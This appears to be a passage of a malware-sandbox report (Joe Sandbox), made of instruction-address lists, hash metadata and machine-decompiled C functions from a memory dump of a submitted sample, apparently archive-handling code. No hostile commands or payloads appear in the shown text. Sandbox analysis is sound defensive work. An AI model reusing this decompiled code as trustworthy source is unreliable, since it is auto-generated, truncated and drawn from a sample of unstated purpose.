0x00a31c65
0x00a31c71
0x00a31c71
0x00a31c78
0x00a31c7e
0x00a31c7e
0x00a31c80
0x00a31c88
0x00a31c88
0x00a31c8d
0x00a31c91
0x00000000
0x00a31c97
0x00a31c97
0x00a31c97
0x00a31ca1
0x00a31ca7
0x00a31dc1
0x00a31dc1
0x00a31dc8
0x00a31dd3
0x00a31de3
0x00a31de8
0x00a31de8
0x00000000
0x00a31de8
0x00a31dca
0x00a31dd1
0x00000000
0x00000000
0x00000000
0x00a31dd1
0x00a31cad
0x00a31cb4
0x00a31cc3
0x00a31cc3
0x00a31cc7
0x00000000
0x00000000
0x00a31cd4
0x00a31cdc
0x00a31cde
0x00a31ce0
0x00a31ce8
0x00a31cf1
0x00a31cfa
0x00a31d03
0x00a31d0c
0x00a31d54
0x00a31d56
0x00a31d5b
0x00a31d5d
0x00000000
0x00000000
0x00a31d18
0x00a31d1e
0x00a31d21
0x00a31d43
0x00a31d46
0x00a31d61
0x00a31d68
0x00a31d77
0x00a31d77
0x00a31d77
0x00a31d79
0x00a31d79
0x00a31d7f
0x00a31d82
0x00a31d8b
0x00a31d94
0x00a31d9d
0x00a31da6
0x00a31db7
0x00a31dbf
0x00000000
0x00a31dbf
0x00a31d6a
0x00a31d71
0x00000000
0x00000000
0x00a31d73
0x00000000
0x00a31d73
0x00a31d48
0x00a31d4b
0x00000000
0x00000000
0x00a31d4d
0x00a31d4f
0x00000000
0x00a31d4f
0x00a31d23
0x00a31d2a
0x00a31d39
0x00a31d39
0x00a31d39
0x00a31d3b
0x00a31d3b
0x00000000
0x00a31d3b
0x00a31d2c
0x00a31d33
0x00000000
0x00000000
0x00a31d35
0x00000000
0x00a31d35
0x00000000
0x00a31d5f
0x00a31cb6
0x00a31cbd
0x00000000
0x00000000
0x00000000
0x00a31cbd
0x00a31c91
0x00a31c7a
0x00a31c7c
0x00000000
0x00000000
0x00000000
0x00a31c7c
0x00a31c67
0x00a31c6b
0x00000000
0x00000000
0x00000000
0x00a31c6b
0x00a31c1c
0x00a31c1e
0x00a31c21
0x00a31c23
0x00a31c28
0x00a31c2e
0x00a31c31
0x00000000
0x00000000
0x00a31c37
0x00a31c3e
0x00a31c49
0x00a31c4b
0x00a31c50
0x00a31c52
0x00a31c56
0x00a31c58
0x00000000
0x00000000
0x00000000
0x00a31c58
0x00a31c40
0x00a31c43
0x00000000
0x00000000
0x00000000
0x00a31c43
0x00a31d11
0x00000000
0x00a31d11
0x00a31bdb
0x00a31be4
0x00a31be9
0x00a31bf1
0x00a31bf3
0x00a31bf6
0x00000000
0x00000000
0x00a31bf8
0x00a31bfb
0x00000000
0x00000000
0x00a31bff
0x00000000
0x00a31bff
0x00a31bcd
0x00000000
0x00a31bcd
0x00a31b9b
0x00000000
0x00000000
0x00000000
0x00000000
0x00a31aed
0x00a31aed
0x00a31af0
0x00a31af2
0x00a31af5
0x00000000
0x00000000
0x00a31afb
0x00a31b00
0x00a31b02
0x00a31b3e
0x00a31b3e
0x00000000
0x00a31b3e
0x00a31b04
0x00a31b07
0x00a31b0d
0x00a31b10
0x00a31b48
0x00a31b4a
0x00a31b50
0x00a31b56
0x00a31b5c
0x00a31b64
0x00a31b66
0x00a31b6c
0x00a31b6f
0x00a31b76
0x00a31b80
0x00a31b85
0x00a31b8d
0x00000000
0x00a31b8d
0x00a31b71
0x00a31b74
0x00000000
0x00000000
0x00000000
0x00a31b74
0x00a31b12
0x00a31b14
0x00000000
0x00000000
0x00a31b16
0x00a31b19
0x00000000
0x00000000
0x00a31b1b
0x00a31b1f
0x00000000
0x00000000
0x00a31b24
0x00a31b26
0x00a31b2a
0x00000000
0x00000000
0x00a31b2c
0x00a31b30
0x00000000
0x00000000
0x00a31b32
0x00a31b36
0x00000000
0x00000000
0x00a31b38
0x00a31b3c
0x00000000
0x00000000
0x00000000
0x00a31b41
0x00a31b41
0x00a31b42
0x00a31b42
0x00000000
0x00a31b46
0x00a31a61
0x00a31a6a
0x00a31a70
0x00a31a73
0x00a31a78
0x00a31a80
0x00a31a88
0x00a31a8d
0x00a31a95
0x00a31a9a
0x00a31a9a
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00A31A09

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6f175c42e22d27a61794387f6b4610236905cff5d998d1170b54518891d0ad1c
Instruction ID: 2f005ca85141b03e82f42715f977caca64020dc5b93c3e71e7bcd3effb0f36ff
Opcode Fuzzy Hash: 6f175c42e22d27a61794387f6b4610236905cff5d998d1170b54518891d0ad1c
Instruction Fuzzy Hash: FBC19F70A002549FEF15CF68C894BB9BBB5EF16310F0845BAFC469B296DB309945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A33BBA Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00A33BBA(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t79;
				signed int _t86;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t124;
				char _t125;
				intOrPtr _t133;
				signed int _t135;
				intOrPtr _t149;
				signed int _t152;
				void* _t155;
				void* _t157;

				E00A4EB78(0xa626da, _t157);
				E00A4EC50(0xe6e0);
				_t155 = __ecx;
				_t160 =  *((char*)(__ecx + 0x6cdc));
				if( *((char*)(__ecx + 0x6cdc)) == 0) {
					__eflags =  *((char*)(__ecx + 0x4608)) - 5;
					if(__eflags > 0) {
						L26:
						E00A3138B(__eflags, 0x1e, _t155 + 0x32);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x6cc8)) - 3;
					__eflags =  *((intOrPtr*)(__ecx + 0x4604)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cc8)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t86 =  *(__ecx + 0x5640) |  *(__ecx + 0x5644);
					__eflags = _t86;
					if(_t86 != 0) {
						L7:
						_t124 = _t155 + 0x20f8;
						E00A3CFD4(_t86, _t124);
						_push(_t124);
						E00A42089(_t157 - 0xe6ec, __eflags);
						_t125 = 0;
						_push(0);
						_push( *((intOrPtr*)(_t155 + 0x56dc)));
						 *((intOrPtr*)(_t157 - 4)) = 0;
						E00A43377(0, _t157 - 0xe6ec);
						_t152 =  *(_t157 + 8);
						__eflags =  *(_t157 + 0xc);
						if( *(_t157 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t155 + 0x5683)) - _t125;
							if( *((intOrPtr*)(_t155 + 0x5683)) == _t125) {
								L18:
								E00A3AB1A(_t155 + 0x21b8, _t149,  *((intOrPtr*)(_t155 + 0x5658)), 1);
								_t133 =  *((intOrPtr*)(_t155 + 0x5644));
								_t91 =  *((intOrPtr*)(_t155 + 0x5640));
								 *((intOrPtr*)(_t155 + 0x2124)) = _t133;
								 *((intOrPtr*)(_t155 + 0x211c)) = _t133;
								 *((intOrPtr*)(_t155 + 0x2120)) = _t91;
								 *((intOrPtr*)(_t155 + 0x2118)) = _t91;
								 *((char*)(_t155 + 0x2128)) = _t125;
								E00A3D099(_t155 + 0x20f8, _t155,  *(_t157 + 0xc));
								 *((char*)(_t155 + 0x2129)) =  *((intOrPtr*)(_t157 + 0x10));
								 *((char*)(_t155 + 0x214f)) =  *((intOrPtr*)(_t155 + 0x5681));
								 *((intOrPtr*)(_t155 + 0x2138)) = _t155 + 0x45e8;
								 *((intOrPtr*)(_t155 + 0x213c)) = _t125;
								_t96 =  *((intOrPtr*)(_t155 + 0x5648));
								_t135 =  *(_t155 + 0x564c);
								 *((intOrPtr*)(_t157 - 0x9aa4)) = _t96;
								 *(_t157 - 0x9aa0) = _t135;
								 *((char*)(_t157 - 0x9a8c)) = _t125;
								__eflags =  *((intOrPtr*)(_t155 + 0x4608)) - _t125;
								if(__eflags != 0) {
									E00A43020(_t157 - 0xe6ec,  *((intOrPtr*)(_t155 + 0x4604)), _t125);
								} else {
									_push(_t135);
									_push(_t96);
									_push(_t155 + 0x20f8); // executed
									E00A39215(_t125, _t152, __eflags); // executed
								}
								asm("sbb eax, eax");
								__eflags = E00A3AAEA(_t125, _t155 + 0x21b8, _t155 + 0x5658,  ~( *(_t155 + 0x56b2) & 0x000000ff) & _t155 + 0x000056b3);
								if(__eflags != 0) {
									_t125 = 1;
								} else {
									E00A32021(__eflags, 0x1f, _t155 + 0x32, _t155 + 0x4610);
									E00A36D83(0xa71098, 3);
									__eflags = _t152;
									if(_t152 != 0) {
										E00A33EDE(_t152);
									}
								}
								L25:
								E00A42297(_t157 - 0xe6ec, _t152, _t155);
								_t79 = _t125;
								goto L28;
							}
							_t149 =  *((intOrPtr*)(_t155 + 0x21d4));
							__eflags =  *((intOrPtr*)(_t149 + 0x6124)) - _t125;
							if( *((intOrPtr*)(_t149 + 0x6124)) == _t125) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t144 =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							__eflags =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							E00A3D051(_t155 + 0x20f8, _t125,  *((intOrPtr*)(_t155 + 0x5684)), _t149 + 0x6024, _t144, _t155 + 0x5699,  *((intOrPtr*)(_t155 + 0x56d4)), _t155 + 0x56b3, _t155 + 0x56aa);
							goto L18;
						}
						__eflags =  *(_t155 + 0x564c);
						if(__eflags < 0) {
							L12:
							__eflags = _t152;
							if(_t152 != 0) {
								E00A320BD(_t152,  *((intOrPtr*)(_t155 + 0x5648)));
								E00A3D0B6(_t155 + 0x20f8,  *_t152,  *((intOrPtr*)(_t155 + 0x5648)));
							} else {
								 *((char*)(_t155 + 0x2129)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00A3138B(__eflags, 0x1e, _t155 + 0x32);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t155 + 0x5648)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x5681)) - _t86;
					if( *((intOrPtr*)(__ecx + 0x5681)) != _t86) {
						goto L7;
					} else {
						_t79 = 1;
						goto L28;
					}
				} else {
					E00A3138B(_t160, 0x1d, __ecx + 0x32);
					E00A36D83(0xa71098, 3);
					L27:
					_t79 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
					return _t79;
				}
			}

0x00a33bbf
0x00a33bc9
0x00a33bcf
0x00a33bd1
0x00a33bd8
0x00a33bf6
0x00a33bfd
0x00a33e51
0x00a33e57
0x00000000
0x00a33e57
0x00a33c05
0x00a33c16
0x00a33c1c
0x00000000
0x00000000
0x00a33c28
0x00a33c28
0x00a33c2e
0x00a33c3f
0x00a33c40
0x00a33c49
0x00a33c4e
0x00a33c55
0x00a33c5a
0x00a33c62
0x00a33c63
0x00a33c69
0x00a33c6c
0x00a33c71
0x00a33c74
0x00a33c77
0x00a33ccc
0x00a33ccc
0x00a33cd2
0x00a33d2e
0x00a33d3c
0x00a33d41
0x00a33d4a
0x00a33d50
0x00a33d56
0x00a33d63
0x00a33d69
0x00a33d6f
0x00a33d75
0x00a33d7d
0x00a33d89
0x00a33d95
0x00a33d9b
0x00a33da1
0x00a33da7
0x00a33dad
0x00a33db3
0x00a33db9
0x00a33dbf
0x00a33dc5
0x00a33de4
0x00a33dc7
0x00a33dc7
0x00a33dc8
0x00a33dcf
0x00a33dd0
0x00a33dd0
0x00a33dfe
0x00a33e0f
0x00a33e11
0x00a33e3e
0x00a33e13
0x00a33e20
0x00a33e2c
0x00a33e31
0x00a33e33
0x00a33e37
0x00a33e37
0x00a33e33
0x00a33e40
0x00a33e46
0x00a33e4c
0x00000000
0x00a33e4e
0x00a33cd4
0x00a33cda
0x00a33ce0
0x00000000
0x00000000
0x00a33d10
0x00a33d12
0x00a33d12
0x00a33d29
0x00000000
0x00a33d29
0x00a33c79
0x00a33c7f
0x00a33c9f
0x00a33c9f
0x00a33ca1
0x00a33cb4
0x00a33cc7
0x00a33ca3
0x00a33ca3
0x00a33ca3
0x00000000
0x00a33ca1
0x00a33c81
0x00a33c8f
0x00a33c95
0x00000000
0x00a33c95
0x00a33c83
0x00a33c8d
0x00000000
0x00000000
0x00000000
0x00a33c8d
0x00a33c30
0x00a33c36
0x00000000
0x00a33c38
0x00a33c38
0x00000000
0x00a33c38
0x00a33bda
0x00a33be0
0x00a33bec
0x00a33e5c
0x00a33e5c
0x00a33e5e
0x00a33e62
0x00a33e6a
0x00a33e6a

APIs

__EH_prolog.LIBCMT ref: 00A33BBF

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5a39cbd43eb7c08355effe4badf9c3e4b636e69cd8af770321b3625748544295
Instruction ID: 6b9f6b3aee5cbd1150a7dcf9ee274e99b13ed6b5f177ac62d2cf6b2431f7af7b
Opcode Fuzzy Hash: 5a39cbd43eb7c08355effe4badf9c3e4b636e69cd8af770321b3625748544295
Instruction Fuzzy Hash: 5871E176504B849EDB35DF70C941AE7B7E9AF14301F40492EF2AB87241EA326A88CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00A38284 Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00A38284(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __ebx;
				void* __esi;
				char _t48;
				void* _t51;
				intOrPtr _t54;
				void* _t56;
				char _t58;
				signed int _t84;
				intOrPtr _t85;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t99;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edi;
				_t92 = __edx;
				E00A4EB78(0xa62831, _t99);
				E00A4EC50(0x9d64);
				_t97 = __ecx;
				_t1 = _t99 - 0x9d70; // -38256
				_push( *((intOrPtr*)(__ecx + 8)));
				E00A313DC(_t1, __edi, _t102);
				 *((intOrPtr*)(_t99 - 4)) = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 0x82de)) == 0) {
					_t8 = _t99 - 0x9d70; // -38256
					_t48 = E00A39F42(_t8, __edi, __ecx, __ecx + 0xfe);
					__eflags = _t48;
					if(_t48 != 0) {
						goto L3;
					}
				} else {
					 *((intOrPtr*)(_t99 - 0x9d60)) = 1;
					L3:
					_t9 = _t99 - 0x9d70; // -38256, executed
					_t51 = E00A31A04(_t9, _t92, 1); // executed
					if(_t51 != 0) {
						__eflags =  *((intOrPtr*)(_t99 - 0x3093));
						if( *((intOrPtr*)(_t99 - 0x3093)) == 0) {
							_push(_t94);
							_t95 = 0;
							__eflags =  *((intOrPtr*)(_t99 - 0x30a3));
							if(__eflags != 0) {
								_t12 = _t99 - 0x9d3e; // -38206
								_t13 = _t99 - 0x1010; // -2064
								_t65 = E00A40602(_t13, _t12, 0x800);
								__eflags =  *((intOrPtr*)(_t99 - 0x309e));
								while(1) {
									_t19 = _t99 - 0x1010; // -2064
									E00A3C0C5(_t19, 0x800, (_t65 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t20 = _t99 - 0x2058; // -6232
									E00A36EDB(_t20);
									_push(0);
									_t21 = _t99 - 0x2058; // -6232
									_t22 = _t99 - 0x1010; // -2064
									__eflags = E00A3A56D(_t20, __eflags, _t22, _t21);
									if(__eflags == 0) {
										break;
									}
									_t95 = _t95 +  *((intOrPtr*)(_t99 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *((char*)(_t99 - 0x309e));
								}
								 *((intOrPtr*)(_t97 + 0xa0)) =  *((intOrPtr*)(_t97 + 0xa0)) + _t95;
								asm("adc [esi+0xa4], ebx");
							}
							_t25 = _t99 - 0x9d70; // -38256
							E00A38430(_t97, __eflags, _t25);
							_t54 =  *((intOrPtr*)(_t97 + 8));
							_t93 = 0x49;
							_pop(_t94);
							_t84 =  *(_t54 + 0x92fa) & 0x0000ffff;
							__eflags = _t84 - 0x54;
							if(_t84 == 0x54) {
								L13:
								 *((char*)(_t54 + 0x7201)) = 1;
							} else {
								__eflags = _t84 - _t93;
								if(_t84 == _t93) {
									goto L13;
								}
							}
							_t85 =  *((intOrPtr*)(_t97 + 8));
							__eflags =  *((intOrPtr*)(_t85 + 0x92fa)) - _t93;
							if( *((intOrPtr*)(_t85 + 0x92fa)) != _t93) {
								 *((char*)(_t85 + 0x7201)) =  *((char*)(_t85 + 0x7201)) == 0;
								E00A41B66((_t97 + 0x000000fe & 0xffffff00 |  *((char*)(_t85 + 0x7201)) == 0x00000000) & 0x000000ff, _t97 + 0xfe);
							}
							_t35 = _t99 - 0x9d70; // -38256
							E00A31F6D(_t35, _t93);
							do {
								_t36 = _t99 - 0x9d70; // -38256
								_t56 = E00A33B2D(_t36, _t93, _t97);
								_t37 = _t99 - 0xd; // 0x7f3
								_t38 = _t99 - 0x9d70; // -38256
								_t58 = E00A3848E(_t97, _t38, _t56, _t37); // executed
								__eflags = _t58;
							} while (_t58 != 0);
						}
					} else {
						E00A36D83(0xa71098, 1);
					}
				}
				_t39 = _t99 - 0x9d70; // -38256, executed
				E00A31692(0, _t39, _t94, _t97); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
				return 0;
			}

0x00a38284
0x00a38284
0x00a38284
0x00a38289
0x00a38293
0x00a3829a
0x00a3829c
0x00a382a2
0x00a382a5
0x00a382af
0x00a382b9
0x00a382ce
0x00a382d4
0x00a382d9
0x00a382db
0x00000000
0x00000000
0x00a382bb
0x00a382bb
0x00a382e1
0x00a382e3
0x00a382e9
0x00a382f0
0x00a38303
0x00a38309
0x00a3830f
0x00a38310
0x00a38312
0x00a38318
0x00a3831f
0x00a38326
0x00a3832d
0x00a38332
0x00a3834d
0x00a38359
0x00a38360
0x00a38365
0x00a3836b
0x00a38370
0x00a38372
0x00a38379
0x00a38385
0x00a38387
0x00000000
0x00000000
0x00a3833a
0x00a38340
0x00a38346
0x00a38346
0x00a38389
0x00a3838f
0x00a3838f
0x00a38395
0x00a3839e
0x00a383a3
0x00a383a8
0x00a383a9
0x00a383aa
0x00a383b1
0x00a383b4
0x00a383bb
0x00a383bb
0x00a383b6
0x00a383b6
0x00a383b9
0x00000000
0x00000000
0x00a383b9
0x00a383c2
0x00a383c5
0x00a383cc
0x00a383dc
0x00a383e3
0x00a383e3
0x00a383e8
0x00a383ee
0x00a383f3
0x00a383f3
0x00a383f9
0x00a383fe
0x00a38403
0x00a3840c
0x00a38411
0x00a38411
0x00a383f3
0x00a382f2
0x00a382f9
0x00a382f9
0x00a382f0
0x00a38415
0x00a3841b
0x00a38427
0x00a3842f

APIs

__EH_prolog.LIBCMT ref: 00A38289

Part of subcall function 00A313DC: __EH_prolog.LIBCMT ref: 00A313E1

Part of subcall function 00A3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 0c08daf6018bef68e224012dd0469a8bb1e44d72447f3b988822709a97c0a76c
Instruction ID: fbfb23ae9375d62a59dfe9b1b649e468140d79c96635dd4aae1db32b812047eb
Opcode Fuzzy Hash: 0c08daf6018bef68e224012dd0469a8bb1e44d72447f3b988822709a97c0a76c
Instruction Fuzzy Hash: 724195719447589ADB20EBA0CD55AEAB3B8AF00304F4444EBF18AA7193EB755EC9CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A313E1 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00A313E1(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t55;
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E00A4EB78(_t55, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E00A39556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xa635f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00A35E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00A3CE40(__ecx + 0x20f8, __edx, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E00A3157A();
				_t61 = E00A3157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E00A4EB38(__edx, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E00A3B505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E00A4FFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E00A4FFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E00A4FFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00a313e1
0x00a313e1
0x00a313e1
0x00a313e6
0x00a313e7
0x00a313ea
0x00a313ec
0x00a313ef
0x00a313f6
0x00a31402
0x00a31405
0x00a31410
0x00a31414
0x00a3141f
0x00a31425
0x00a3142b
0x00a31436
0x00a3143b
0x00a31440
0x00a31447
0x00a3144d
0x00a31453
0x00a31455
0x00a3147a
0x00a31457
0x00a31457
0x00a3145c
0x00a31462
0x00a31465
0x00a3146b
0x00a31476
0x00a3146d
0x00a3146f
0x00a3146f
0x00a3146b
0x00a3147c
0x00a31488
0x00a3148f
0x00a31496
0x00a3149f
0x00a314aa
0x00a314b4
0x00a314ba
0x00a314c0
0x00a314c6
0x00a314cc
0x00a314d2
0x00a314d8
0x00a314df
0x00a314e5
0x00a314eb
0x00a314f1
0x00a314f7
0x00a314fd
0x00a3150c
0x00a3151b
0x00a31526
0x00a3152e
0x00a31534
0x00a3153a
0x00a31540
0x00a31546
0x00a3154c
0x00a31552
0x00a3155b
0x00a31561
0x00a31567
0x00a3156f
0x00a31577

APIs

__EH_prolog.LIBCMT ref: 00A313E1

Part of subcall function 00A35E37: __EH_prolog.LIBCMT ref: 00A35E3C

Part of subcall function 00A3CE40: __EH_prolog.LIBCMT ref: 00A3CE45

Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1c6e65a73473d48141bc614a0acf203bf140fbc22333563e38dfb4e044dc44e3
Instruction ID: 4691da99b42efce64f75567cea7cf01ad22eadad3a041f48c7fbd751dd2005db
Opcode Fuzzy Hash: 1c6e65a73473d48141bc614a0acf203bf140fbc22333563e38dfb4e044dc44e3
Instruction Fuzzy Hash: FD4136B0905B409EE724DF798985AE6FBE5BF19310F50492EE5FF83282CB726654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A313DC Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00A313DC(intOrPtr __ecx, void* __edi, void* __eflags) {
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t86;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E00A4EB78(0xa62635, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E00A39556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xa635f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00A35E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00A3CE40(__ecx + 0x20f8, _t86, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E00A3157A();
				_t61 = E00A3157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
